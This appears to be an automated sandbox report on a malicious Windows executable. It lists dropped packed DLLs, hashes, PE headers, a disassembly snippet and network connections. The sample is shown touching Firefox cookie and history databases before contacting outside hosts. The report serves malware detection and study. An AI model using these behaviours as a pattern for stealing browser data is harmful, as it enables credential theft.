SHA1:	C156D9F2D0E80B4CF41794CD9B8B1E8A352E0A0B
SHA-256:	B1AAC1E461174BBAE952434E4DAC092590D72B9832A04457C94BD9BB7EE8AD79
SHA-512:	653A7FFF6A2B6BFFB9EA2C0B72DDB83C9C53D555E798EEA47101B0D932358180A01AF2B9DAB9C27723057439C1EAFFB8D84B9B41F6F9CD1C3C934F1794104D45
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......ih.-...-...-...r../...r@.#...r..!...r..%...r..)...$q..7....{..&...-...H...r......r..,...rB.,...r..,...Rich-...........PE..d...R.Vc.........." ...!..........D...]...D...................................^...........`.........................................H.].......].......].......V../...........r^.....................................(.].@...........................................UPX0......D.............................UPX1..........D.....................@....rsrc.........].....................@..............................................................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI67202\select.pyd

Download File

Process:	C:\Users\user\Desktop\9afaXJv52z.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	24960
Entropy (8bit):	7.407412042104121
Encrypted:	false
SSDEEP:	384:5oxUAW1guHrhWgWLBNZa7gJXZjNID7Gu6OIYiSy1pCQlIJNPxh8E9VF0NyUT2:exjW1J2pJjNID7GuIYiSyvCPxWEC
MD5:	C39459806C712B3B3242F8376218C1E1
SHA1:	85D254FB6CC5D6ED20A04026BFF1158C8FD0A530
SHA-256:	7CBD4339285D145B422AFA280CEE685258BC659806BE9CF8B334805BC45B29C9
SHA-512:	B727C6D1CD451D658E174161135D3BE48D7EFDA21C775B8145BC527A54D6592BFC50919276C6498D2E2233AC1524C1699F59F0F467CC6E43E5B5E9558C87F49D
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........>.t^_f'^_f'^_f'W'.'\_f'.$g&\_f'.$c&R_f'.$b&V_f'.$e&Z_f'.$g&\_f'^_g'._f'.-g&[_f'.$k&__f'.$f&__f'.$.'__f'.$d&__f'Rich^_f'........PE..d...e.Vc.........." ...!.0................................................................`......................................... ...L....................`..............l...........................................@...........................................UPX0....................................UPX1.....0.......(..................@....rsrc................,..............@..............................................................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI67202\sqlite3.dll

Download File

Process:	C:\Users\user\Desktop\9afaXJv52z.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	622976
Entropy (8bit):	7.993556519822549
Encrypted:	true
SSDEEP:	12288:67dpDQ1L3zfmrtWF/azVC9oAnShBJl4cZ1pzgULOX110jt3:cHSzzaQl8VSSh2cZXgULq11y
MD5:	895F001AE969364432372329CAF08B6A
SHA1:	4567FC6672501648B277FE83E6B468A7A2155DDF
SHA-256:	F5DD29E1E99CF8967F7F81487DC624714DCBEC79C1630F929D5507FC95CBFAD7
SHA-512:	05B4559D283EA84174DA72A6C11B8B93B1586B4E7D8CDA8D745C814F8F6DFF566E75F9D7890F32BD9DFE43485244973860F83F96BA39296E28127C9396453261
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........<T.S]:.S]:.S]:.Z%.._]:..&;.Q]:..&?.^]:..&>.[]:..&9.W]:../;.P]:.S];..]:..&2.R]:..&:.R]:..&.R]:..&8.R]:.RichS]:.........................PE..d.....Vc.........." ...!.0...0...............................................0............`.............................................L"......................\...........`-..........................................@...........................................UPX0....................................UPX1.....0.......&..................@....rsrc....0...........*..............@......................................................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI67202\unicodedata.pyd

Download File

Process:	C:\Users\user\Desktop\9afaXJv52z.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	300920
Entropy (8bit):	7.985723274612961
Encrypted:	false
SSDEEP:	6144:12Fuue6iwoBLhgXM5kayIQJCEUcHQdBAFEzz9DxsXcY:12/e6inLOoyVJ/LHQdgipxsMY
MD5:	06A5E52CAF03426218F0C08FC02CC6B8
SHA1:	AE232C63620546716FBB97452D73948EBFD06B35
SHA-256:	118C31FAA930F2849A14C3133DF36420A5832114DF90D77B09CDE0AD5F96F33A
SHA-512:	546B1A01F36D3689B0FDEEDA8B1CE55E7D3451731CA70FFFE6627D542FFF19D7A70E27147CAB1920AAE8BED88272342908D4E9D671D7ABA74ABB5DB398B90718
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........e...l...l...l..\|....l.0.m...l.0.i...l.0.h...l.0.o...l.>.m...l.cvm...l...m...l.>.a...l.>.l...l.>.....l.>.n...l.Rich..l.................PE..d...k.Vc.........." ...!.`.......@.. ....P................................................`.............................................X....................P...................................................... ...@...........................................UPX0.....@..............................UPX1.....`...P...\..................@....rsrc................`..............@......................................................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI67202\yarl\_quoting_c.cp311-win_amd64.pyd

Download File

Process:	C:\Users\user\Desktop\9afaXJv52z.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	modified
Size (bytes):	41472
Entropy (8bit):	7.868227278889233
Encrypted:	false
SSDEEP:	768:dU3TLuhvkAahe3LS0HW7A7I57CdTRgbaa34cU29pU:dCFs7S0HW07I57CBRgkcw
MD5:	9A8F969ECDF0C15734C1D582D2AE35D8
SHA1:	A40691E81982F610A062E49A5AD29CFFB5A2F5A8
SHA-256:	874E52CCEAE9A3C967BAC7B628F4144C32E51FC77F519542FC1BAC19045ECDE8
SHA-512:	E0DEB59ABEF7440F30EFFB1AAB6295B5A50C817F685BE30B21A3C453E3099B97FD71984E6CA6A6C6E0021ABB6E906838566F402B00A11813E67A4E00B119619F
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......../]..A...A...A.......A...@...A..@...A...D...A...E...A...B...A.[.@...A...@.B.A..`I...A..`A...A..`....A..`C...A.Rich..A.................PE..d....Ype.........." ...%.........`.......p................................... ............`.............................................d...............................................................................@...........................................UPX0.....`..............................UPX1.........p......................@....rsrc...............................@......................................................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ilxcasv1.gmr.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wfxafe0f.2ov.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\mk3wzez8

Download File

Process:	C:\Users\user\Desktop\9afaXJv52z.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	4
Entropy (8bit):	2.0
Encrypted:	false
SSDEEP:	3:qn:qn
MD5:	3F1D1D8D87177D3D8D897D7E421F84D6
SHA1:	DD082D742A5CB751290F1DB2BD519C286AA86D95
SHA-256:	F02285FB90ED8C81531FE78CF4E2ABB68A62BE73EE7D317623E2C3E3AEFDFFF2
SHA-512:	2AE2B3936F31756332CA7A4B877D18F3FCC50E41E9472B5CD45A70BEA82E29A0FA956EE6A9EE0E02F23D9DB56B41D19CB51D88AAC06E9C923A820A21023752A9
Malicious:	false
Preview:	blat

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite-shm

Download File

Process:	C:\Users\user\Desktop\9afaXJv52z.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqlite-shm

Download File

Process:	C:\Users\user\Desktop\9afaXJv52z.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	55
Entropy (8bit):	4.306461250274409
Encrypted:	false
SSDEEP:	3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
MD5:	DCA83F08D448911A14C22EBCACC5AD57
SHA1:	91270525521B7FE0D986DB19747F47D34B6318AD
SHA-256:	2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
SHA-512:	96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
Malicious:	false
Preview:	{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

Static File Info

General

File type:	PE32+ executable (GUI) x86-64, for MS Windows
Entropy (8bit):	6.304218706058302
TrID:	Win64 Executable GUI (202006/5) 92.65% Win64 Executable (generic) (12005/4) 5.51% Generic Win/DOS Executable (2004/3) 0.92% DOS Executable Generic (2002/1) 0.92% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	9afaXJv52z.exe
File size:	16'417'517 bytes
MD5:	4d70f444794dedf45c2a6562d4eaed19
SHA1:	337a7a9be709b1a3f848256c9e4a421911c265be
SHA256:	ca120c365ddd0e24311e36e1ec5d4af6db21b0f2ebd6f7dfd0d6a3a730621367
SHA512:	846ed7f6fbdf15ccb13d3dee5261357e8d3efcf8fc0a804ccb0cfafa166d89ba68d688af51d36468c8acd4b66dc209ba5475784ed88fe8eff12c39d0e9faad01
SSDEEP:	196608:ZqqMPAEuton3dDTeeNy+wfm/pf+xfdkRuBnfXWK6tSDrIWOIWsDaqkH:lDtet5y+9/pWFGREnfXBPDrIW1TaDH
TLSH:	6FF63328B3E11EF6F8A71A75D0D2D821E372FC510B68CB8B436456B90F1B9605D2FB58
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......U.Q...?...?...?.Z.<...?.Z.:...?.Z.;...?.......?...:.9.?...;...?...<...?.Z.>...?...>...?.+.;...?.+.=...?.Rich..?................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x14000c1f0
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x140000000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Time Stamp:	0x6590C704 [Sun Dec 31 01:42:28 2023 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	2
File Version Major:	5
File Version Minor:	2
Subsystem Version Major:	5
Subsystem Version Minor:	2
Import Hash:	1af6c885af093afc55142c2f1761dbe8

Entrypoint Preview

Instruction
dec eax
sub esp, 28h
call 00007FA108BA441Ch
dec eax
add esp, 28h
jmp 00007FA108BA402Fh
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
dec eax
sub esp, 28h
call 00007FA108BA4994h
test eax, eax
je 00007FA108BA41D3h
dec eax
mov eax, dword ptr [00000030h]
dec eax
mov ecx, dword ptr [eax+08h]
jmp 00007FA108BA41B7h
dec eax
cmp ecx, eax
je 00007FA108BA41C6h
xor eax, eax
dec eax
cmpxchg dword ptr [0003427Ch], ecx
jne 00007FA108BA41A0h
xor al, al
dec eax
add esp, 28h
ret
mov al, 01h
jmp 00007FA108BA41A9h
int3
int3
int3
inc eax
push ebx
dec eax
sub esp, 20h
movzx eax, byte ptr [00034267h]
test ecx, ecx
mov ebx, 00000001h
cmove eax, ebx
mov byte ptr [00034257h], al
call 00007FA108BA4793h
call 00007FA108BA58B2h
test al, al
jne 00007FA108BA41B6h
xor al, al
jmp 00007FA108BA41C6h
call 00007FA108BB2851h
test al, al
jne 00007FA108BA41BBh
xor ecx, ecx
call 00007FA108BA58C2h
jmp 00007FA108BA419Ch
mov al, bl
dec eax
add esp, 20h
pop ebx
ret
int3
int3
int3
inc eax
push ebx
dec eax
sub esp, 20h
cmp byte ptr [0003421Ch], 00000000h
mov ebx, ecx
jne 00007FA108BA4219h
cmp ecx, 01h
jnbe 00007FA108BA421Ch
call 00007FA108BA48FAh
test eax, eax
je 00007FA108BA41DAh

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x3cdcc	0x78	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x46000	0x92c	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x42000	0x22a4	.pdata
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x47000	0x75c	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x3a330	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x3a1f0	0x140	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2b000	0x420	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x29c90	0x29e00	False	0.5523087686567164	data	6.4831047330596565	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x2b000	0x12bf4	0x12c00	False	0.5184375	data	5.835005508115744	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x3e000	0x3338	0xe00	False	0.1328125	Matlab v4 mat-file (little endian) f\324\377\3772\242\337-\231+, text, rows 4294967295, columns 0	1.8271683819747706	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata	0x42000	0x22a4	0x2400	False	0.4720052083333333	data	5.316391891279308	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
_RDATA	0x45000	0x15c	0x200	False	0.38671875	data	2.83326547900447	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0x46000	0x92c	0xa00	False	0.424609375	data	5.142504127612272	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x47000	0x75c	0x800	False	0.5458984375	data	5.240127521097618	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x460a0	0x37c	data			0.460762331838565
RT_MANIFEST	0x4641c	0x50d	XML 1.0 document, ASCII text			0.4694508894044857

Imports

DLL	Import
USER32.dll	CreateWindowExW, MessageBoxW, MessageBoxA, SystemParametersInfoW, DestroyIcon, SetWindowLongPtrW, GetWindowLongPtrW, GetClientRect, InvalidateRect, ReleaseDC, GetDC, DrawTextW, GetDialogBaseUnits, EndDialog, DialogBoxIndirectParamW, MoveWindow, SendMessageW
COMCTL32.dll
KERNEL32.dll	IsValidCodePage, GetStringTypeW, GetFileAttributesExW, HeapReAlloc, FlushFileBuffers, GetCurrentDirectoryW, GetACP, GetOEMCP, GetModuleHandleW, MulDiv, GetLastError, SetDllDirectoryW, GetModuleFileNameW, CreateSymbolicLinkW, GetProcAddress, GetCommandLineW, GetEnvironmentVariableW, GetCPInfo, ExpandEnvironmentStringsW, CreateDirectoryW, GetTempPathW, WaitForSingleObject, Sleep, GetExitCodeProcess, CreateProcessW, GetStartupInfoW, FreeLibrary, LoadLibraryExW, SetConsoleCtrlHandler, FindClose, FindFirstFileExW, CloseHandle, GetCurrentProcess, LocalFree, FormatMessageW, MultiByteToWideChar, WideCharToMultiByte, GetEnvironmentStringsW, FreeEnvironmentStringsW, GetProcessHeap, GetTimeZoneInformation, HeapSize, WriteConsoleW, SetEndOfFile, SetEnvironmentVariableW, RtlUnwindEx, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, SetLastError, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, RaiseException, RtlPcToFileHeader, GetCommandLineA, CreateFileW, GetDriveTypeW, GetFileInformationByHandle, GetFileType, PeekNamedPipe, SystemTimeToTzSpecificLocalTime, FileTimeToSystemTime, GetFullPathNameW, RemoveDirectoryW, FindNextFileW, SetStdHandle, DeleteFileW, ReadFile, GetStdHandle, WriteFile, ExitProcess, GetModuleHandleExW, HeapFree, GetConsoleMode, ReadConsoleW, SetFilePointerEx, GetConsoleOutputCP, GetFileSizeEx, HeapAlloc, FlsAlloc, FlsGetValue, FlsSetValue, FlsFree, CompareStringW, LCMapStringW
ADVAPI32.dll	OpenProcessToken, GetTokenInformation, ConvertStringSecurityDescriptorToSecurityDescriptorW, ConvertSidToStringSidW
GDI32.dll	SelectObject, DeleteObject, CreateFontIndirectW

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 13, 2024 06:50:16.196021080 CET	49710	80	192.168.2.7	208.95.112.1
Jan 13, 2024 06:50:16.340521097 CET	80	49710	208.95.112.1	192.168.2.7
Jan 13, 2024 06:50:16.340610981 CET	49710	80	192.168.2.7	208.95.112.1
Jan 13, 2024 06:50:16.407463074 CET	49710	80	192.168.2.7	208.95.112.1
Jan 13, 2024 06:50:16.598507881 CET	80	49710	208.95.112.1	192.168.2.7
Jan 13, 2024 06:50:16.599359989 CET	49710	80	192.168.2.7	208.95.112.1
Jan 13, 2024 06:50:16.740725994 CET	80	49710	208.95.112.1	192.168.2.7
Jan 13, 2024 06:50:16.741622925 CET	49710	80	192.168.2.7	208.95.112.1
Jan 13, 2024 06:50:27.249651909 CET	49720	443	192.168.2.7	162.159.128.233
Jan 13, 2024 06:50:27.249700069 CET	443	49720	162.159.128.233	192.168.2.7
Jan 13, 2024 06:50:27.249769926 CET	49720	443	192.168.2.7	162.159.128.233
Jan 13, 2024 06:50:27.251135111 CET	49720	443	192.168.2.7	162.159.128.233
Jan 13, 2024 06:50:27.251151085 CET	443	49720	162.159.128.233	192.168.2.7
Jan 13, 2024 06:50:27.455388069 CET	443	49720	162.159.128.233	192.168.2.7
Jan 13, 2024 06:50:27.456013918 CET	49720	443	192.168.2.7	162.159.128.233
Jan 13, 2024 06:50:27.456036091 CET	443	49720	162.159.128.233	192.168.2.7
Jan 13, 2024 06:50:27.457503080 CET	443	49720	162.159.128.233	192.168.2.7
Jan 13, 2024 06:50:27.457572937 CET	49720	443	192.168.2.7	162.159.128.233
Jan 13, 2024 06:50:27.459033966 CET	49720	443	192.168.2.7	162.159.128.233
Jan 13, 2024 06:50:27.459160089 CET	443	49720	162.159.128.233	192.168.2.7
Jan 13, 2024 06:50:27.459527969 CET	49720	443	192.168.2.7	162.159.128.233
Jan 13, 2024 06:50:27.459538937 CET	443	49720	162.159.128.233	192.168.2.7
Jan 13, 2024 06:50:27.459686041 CET	49720	443	192.168.2.7	162.159.128.233
Jan 13, 2024 06:50:27.459701061 CET	443	49720	162.159.128.233	192.168.2.7
Jan 13, 2024 06:50:27.684170961 CET	443	49720	162.159.128.233	192.168.2.7
Jan 13, 2024 06:50:27.684322119 CET	443	49720	162.159.128.233	192.168.2.7
Jan 13, 2024 06:50:27.684869051 CET	49720	443	192.168.2.7	162.159.128.233
Jan 13, 2024 06:50:27.685476065 CET	49720	443	192.168.2.7	162.159.128.233
Jan 13, 2024 06:50:27.685493946 CET	443	49720	162.159.128.233	192.168.2.7
Jan 13, 2024 06:50:27.688519001 CET	49721	443	192.168.2.7	162.159.128.233
Jan 13, 2024 06:50:27.688556910 CET	443	49721	162.159.128.233	192.168.2.7
Jan 13, 2024 06:50:27.688632011 CET	49721	443	192.168.2.7	162.159.128.233
Jan 13, 2024 06:50:27.689486027 CET	49721	443	192.168.2.7	162.159.128.233
Jan 13, 2024 06:50:27.689497948 CET	443	49721	162.159.128.233	192.168.2.7
Jan 13, 2024 06:50:27.888324976 CET	443	49721	162.159.128.233	192.168.2.7
Jan 13, 2024 06:50:27.888984919 CET	49721	443	192.168.2.7	162.159.128.233
Jan 13, 2024 06:50:27.889003038 CET	443	49721	162.159.128.233	192.168.2.7
Jan 13, 2024 06:50:27.890506983 CET	443	49721	162.159.128.233	192.168.2.7
Jan 13, 2024 06:50:27.890578032 CET	49721	443	192.168.2.7	162.159.128.233
Jan 13, 2024 06:50:27.891668081 CET	49721	443	192.168.2.7	162.159.128.233
Jan 13, 2024 06:50:27.891755104 CET	443	49721	162.159.128.233	192.168.2.7
Jan 13, 2024 06:50:27.892075062 CET	49721	443	192.168.2.7	162.159.128.233
Jan 13, 2024 06:50:27.892080069 CET	443	49721	162.159.128.233	192.168.2.7
Jan 13, 2024 06:50:27.892189026 CET	49721	443	192.168.2.7	162.159.128.233
Jan 13, 2024 06:50:27.933933973 CET	443	49721	162.159.128.233	192.168.2.7
Jan 13, 2024 06:50:27.945255995 CET	49721	443	192.168.2.7	162.159.128.233
Jan 13, 2024 06:50:28.181515932 CET	443	49721	162.159.128.233	192.168.2.7
Jan 13, 2024 06:50:28.181688070 CET	443	49721	162.159.128.233	192.168.2.7
Jan 13, 2024 06:50:28.181792021 CET	49721	443	192.168.2.7	162.159.128.233
Jan 13, 2024 06:50:28.182259083 CET	49721	443	192.168.2.7	162.159.128.233
Jan 13, 2024 06:50:28.182276011 CET	443	49721	162.159.128.233	192.168.2.7
Jan 13, 2024 06:50:28.185606003 CET	49722	443	192.168.2.7	162.159.136.232
Jan 13, 2024 06:50:28.185642958 CET	443	49722	162.159.136.232	192.168.2.7
Jan 13, 2024 06:50:28.185705900 CET	49722	443	192.168.2.7	162.159.136.232
Jan 13, 2024 06:50:28.186949968 CET	49722	443	192.168.2.7	162.159.136.232
Jan 13, 2024 06:50:28.186983109 CET	443	49722	162.159.136.232	192.168.2.7
Jan 13, 2024 06:50:28.384932041 CET	443	49722	162.159.136.232	192.168.2.7
Jan 13, 2024 06:50:28.385389090 CET	49722	443	192.168.2.7	162.159.136.232
Jan 13, 2024 06:50:28.385413885 CET	443	49722	162.159.136.232	192.168.2.7
Jan 13, 2024 06:50:28.386914015 CET	443	49722	162.159.136.232	192.168.2.7
Jan 13, 2024 06:50:28.386991024 CET	49722	443	192.168.2.7	162.159.136.232
Jan 13, 2024 06:50:28.387999058 CET	49722	443	192.168.2.7	162.159.136.232
Jan 13, 2024 06:50:28.388093948 CET	443	49722	162.159.136.232	192.168.2.7
Jan 13, 2024 06:50:28.388295889 CET	49722	443	192.168.2.7	162.159.136.232
Jan 13, 2024 06:50:28.388317108 CET	443	49722	162.159.136.232	192.168.2.7
Jan 13, 2024 06:50:28.400423050 CET	49722	443	192.168.2.7	162.159.136.232
Jan 13, 2024 06:50:28.400490999 CET	443	49722	162.159.136.232	192.168.2.7
Jan 13, 2024 06:50:28.400604963 CET	49722	443	192.168.2.7	162.159.136.232
Jan 13, 2024 06:50:28.400643110 CET	443	49722	162.159.136.232	192.168.2.7
Jan 13, 2024 06:50:28.400784969 CET	49722	443	192.168.2.7	162.159.136.232
Jan 13, 2024 06:50:28.400824070 CET	443	49722	162.159.136.232	192.168.2.7
Jan 13, 2024 06:50:28.401134014 CET	49722	443	192.168.2.7	162.159.136.232
Jan 13, 2024 06:50:28.401161909 CET	443	49722	162.159.136.232	192.168.2.7
Jan 13, 2024 06:50:28.401321888 CET	49722	443	192.168.2.7	162.159.136.232
Jan 13, 2024 06:50:28.401345015 CET	443	49722	162.159.136.232	192.168.2.7
Jan 13, 2024 06:50:28.401514053 CET	49722	443	192.168.2.7	162.159.136.232
Jan 13, 2024 06:50:28.401563883 CET	443	49722	162.159.136.232	192.168.2.7
Jan 13, 2024 06:50:28.401578903 CET	49722	443	192.168.2.7	162.159.136.232
Jan 13, 2024 06:50:28.401752949 CET	49722	443	192.168.2.7	162.159.136.232
Jan 13, 2024 06:50:28.401782036 CET	49722	443	192.168.2.7	162.159.136.232
Jan 13, 2024 06:50:28.441916943 CET	443	49722	162.159.136.232	192.168.2.7
Jan 13, 2024 06:50:28.442109108 CET	49722	443	192.168.2.7	162.159.136.232
Jan 13, 2024 06:50:28.442176104 CET	49722	443	192.168.2.7	162.159.136.232
Jan 13, 2024 06:50:28.442194939 CET	49722	443	192.168.2.7	162.159.136.232
Jan 13, 2024 06:50:28.489902973 CET	443	49722	162.159.136.232	192.168.2.7
Jan 13, 2024 06:50:28.490114927 CET	49722	443	192.168.2.7	162.159.136.232
Jan 13, 2024 06:50:28.490190029 CET	49722	443	192.168.2.7	162.159.136.232
Jan 13, 2024 06:50:28.490216970 CET	49722	443	192.168.2.7	162.159.136.232
Jan 13, 2024 06:50:28.537904024 CET	443	49722	162.159.136.232	192.168.2.7
Jan 13, 2024 06:50:28.538106918 CET	49722	443	192.168.2.7	162.159.136.232
Jan 13, 2024 06:50:28.538172007 CET	49722	443	192.168.2.7	162.159.136.232
Jan 13, 2024 06:50:28.538211107 CET	49722	443	192.168.2.7	162.159.136.232
Jan 13, 2024 06:50:28.585910082 CET	443	49722	162.159.136.232	192.168.2.7
Jan 13, 2024 06:50:28.586055040 CET	49722	443	192.168.2.7	162.159.136.232
Jan 13, 2024 06:50:28.590960026 CET	443	49722	162.159.136.232	192.168.2.7
Jan 13, 2024 06:50:28.591186047 CET	443	49722	162.159.136.232	192.168.2.7
Jan 13, 2024 06:50:28.686764002 CET	443	49722	162.159.136.232	192.168.2.7
Jan 13, 2024 06:50:29.343676090 CET	443	49722	162.159.136.232	192.168.2.7
Jan 13, 2024 06:50:29.343765020 CET	443	49722	162.159.136.232	192.168.2.7
Jan 13, 2024 06:50:29.343827963 CET	49722	443	192.168.2.7	162.159.136.232
Jan 13, 2024 06:50:29.344726086 CET	49722	443	192.168.2.7	162.159.136.232
Jan 13, 2024 06:50:29.344749928 CET	443	49722	162.159.136.232	192.168.2.7
Jan 13, 2024 06:50:30.218383074 CET	49725	443	192.168.2.7	51.38.43.18
